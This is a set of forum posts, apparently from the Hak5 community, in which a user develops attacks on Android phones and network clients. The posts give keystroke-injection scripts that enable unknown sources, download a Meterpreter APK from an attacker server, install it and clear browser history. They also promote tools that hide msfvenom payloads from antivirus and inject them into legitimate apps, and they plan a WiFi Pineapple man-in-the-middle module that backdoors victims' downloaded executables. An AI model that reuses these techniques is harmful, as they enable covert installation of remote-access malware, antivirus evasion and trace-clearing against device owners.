n33dsh3llz

Well, I was originally unable to get basic ADB working over the OTG like you would connected to the phone directly with USB debugging enabled. I tried the method demmsec did in that payload, but it would never get an IP address. Come to find out, it was able to pull an address once I disabled my mobile data. I assume this is because of checks android does to make sure it is using the best network connection and the bash bunny has no actual connection to the internet. With that, I may just need to add some extra HID commands to get the job done. J Edit: Now I am unable to replicate the Network popup I was getting upon initially turning off mobile data.

Thanks! I was trying to manually transfer the package over and run it. I haven't connected mine to the internet so that may be the way I go this weekend. Also, the FireTV payload seems right where I was going with this, but for Android phones. Thanks for the heads up as this will save some time! The biggest thing with launching the default payload generated by MSFVenom is it will be flagged by AV. Calling the activity will require some work using my AV bypass script as it randomizes the naming structure, but it wouldn't be hard to explain how to get that information. I wasn't thinking of using the connect method with emulating a network adapter, but looks like DemmSec may have saved me some more headaches! Justin

How would I go about getting an ARM version of ADB working on the bash bunny? I tried using Google's Python implementation of ADB, but it required libusb1 and other dependencies. The goal is to make a payload that: Enabled USB debugging (HID) Accepts connection to device (HID) ADB Install's package (bash) ADB launches package (bash) I had the HID payload working for enabling USB debugging, but then realized ADB was for x64 processors. I found a couple ARM versions, but couldn't get any of them working properly. Can anyone help me out with this. Ideally, I would like to utilize my apkwash script (https://github.com/jbreed/apkwash) to generate a lightweight payload to use for pushing onto a device. With ADB you can also attempt gaining root as well through ADB methods that otherwise wouldn't be accessible.

You also want to make sure your sources.list has the repo. http://docs.kali.org/general-use/kali-linux-sources-list-repositories

What is happening is the script is seeing PayloadTrustManager.smali in the pulled apart payload generated by MSFVenom. This payload has a signature I havent spent time avoiding by AVG. The quickest solution is to make sure you are completely updated. On Kali Rolling: apt-get dist-upgrade apt-get update apt-get upgrade Also, after spending a weekend throwing this together I realized the '-x' option on MSFVenom appears to get the job done as well for injecting into other payloads. So if wanting to do a phishing attack instead of using apkinjector you can use msfvenom with the apk to inject into followed by the -x option. Of course, the bash script is very similar to what msfvenom is doing so looking it over will give you an understanding on what is happening and if it is flagged by an AV you can simply modify the bash script to get around it.

Ended up finishing the unknown sources setting, but figured it is a waste of time as it can be easily bypassed once attempting to install. https://github.com/jbreed/usb-ducky-android-download Here is what I think will work best as there is so many issues that can arise. Potential issues: -Default browser not set to chrome. ALT d is to get the URL line for "Internet" app. May add this just to make it fail-safe. -Default browser not set at all. This will simply require pressing the button to relaunch the script as it should have been set with the first run. What would take place after: Install the apk (bypass untrusted sources, select 'open') Clear browsing history if default app wasn't chrome Delete the downloaded .apk file (if launched with Chrome, then the script below will take you to the screen afterwards) DELAY 200 REM ----- BACK OUT TO MAIN MENU ----- ESCAPE ESCAPE REM ----- OPEN BROWSER ------ GUI b DELAY 1000 REM ----- Select url bar and navigate ----- CTRL l ALT d DELAY 200 STRING example.com DELAY 250 ENTER DELAY 250 REM ----- DOWNLOAD HAS BEGAN ----- REM ----- TIME TO INSTALL MANUALLY ----- REM ----- FOR CHROME, CLEARING HISTORY AND OPENING DOWNLOADS ----- CTRL h DELAY 300 TAB TAB TAB DELAY 10 ENTER DELAY 100 F10 DELAY 300 DOWN DOWN DOWN DOWN DOWN DOWN ENTER

Would be similar to using Meterpreter through the internet. WAN IP -> Router-> port-forwarding to Empire listener

Are you scanning from within the local subnet?

Hello Hak5 Community, Trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script giving the user time to launch manually if there is no hotkeys. I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place. Note: WINDOWS+N brings down top slider bar & F10 opens downloads in Chrome.. documents said CNTL+J opened downloads, but it wasn't working for me. Can't figure out a way to open the downloaded .apk file. Here is what I have so far. Keep in mind delays have not been put in yet and this is merely a run-down through using a keyboard: #Allow unknown sources ESCAPE #(x whatever for main screen) WINDOWS+N UP ENTER DOWN ARROW x 6 ENTER DOWN ARROW x 7 ENTER RIGHT ARROW ENTER ESCAPE #(x whatever to get to main screen) #Begin the download and install of the payload WINDOWS+B #Brings up the browser CNTL+SHIFT+N #Open incognito window (if not chrome, shouldnt do anything) CNTL+L #Access the URL bar String http://x.x.x.x:xxxx/payload.apk #types in the file to download ENTER ** FIGURE OUT WAY TO LAUNCH IT ** TAB TAB #Places you at INSTALL ENTER SLEEP X #Give to install TAB TAB ENTER #Launch Recent scripts I wrote to bypass Android AV: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector For this attack, apkwash would be perfect as it would simply mask the small .apk file generated by MSFVenom. Smaller=faster downloading. Maybe a twin-duck for this would work better to install from local media.

Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector

ON-THE-FLY FILE INJECTION Goal: With a MITM attack in progress, be able to sniff traffic and modify any requested downloads to the victim/client machines utilizing Ettercap. With this, the attacker should have the option to use a previously created payload from a file location, or allow for on-the-fly injection using simple ‘expect’ scripts passing a downloaded file over to a program for injection before forwarding it to the client. For pre-set files, the filenames would be modified to match the requested file before being pushed to the client. Ettercap Filters: Locate Exe files Locate Office files Locate PDF files Stored user variables (Pineapple Module options using Bootstrap front-end): Max file size (prevent from injecting large files causing long latencies) Select associated client(s) to attack Injection Method On-the-fly (Shellter, Metasploit, Veil/Macro_safe.py) Payload (would be awesome to detect OS and use a correlated payload for it) LHost LPort Custom/Pre-set files File locations (payload.exe, payload.pdf, payload.doc, payload.docx, payload.xls, etc) Option to auto-add client/file correlation to a blacklist once it was already injected and forwarded Config files: Template for adding more injection methods to supplement Shellter, Veil, Metasploit as the defaults.

Found the youtube series on creating modules: https://www.youtube.com/watch?v=Lvf2At3G1C0 I have experience with Bootstrap and AngularJS so it shouldn't take too long to figure out the formatting for the modules. Only thing is, hopefully I can leverage another module for finding *.exe download requests for a MITM attack otherwise it would make creating this a lot longer. Needs to be able to have a MITM running and replace any .exe a client requests with one that has a custom payload put in it. If anyone knows of something that already does this, then please let me know.

Hello Hak5 members, New to this site and platform, but am pretty excited to be back in the states and to get my hands on the Tetra I purchased. When looking at modules I can't seem to find something similar to the MITMf framework integrated into it. This takes use of filepwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting: 1. Client makes request for .exe file 2. Pineapple forwards to the web server 3. Web server responds 4. Pineapple receives the traffic: If (PARAMS == TRUE): Pass the executable over to Shellter, inject a payload, then forward to the client. else: forward to the client Some of the params you would setup would be maximum file size (to make sure the process doesn't take too long), if the program is already wrapped, etc. Ideally, one would be running some sort HTTPS downgrade attack, or SSL Stripper, so the probability of injection is higher as most sites now use https. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow user's to pipe the executable to whatever program they want to handle the payload injection and just have the module looking for the created file to popup in a specific location.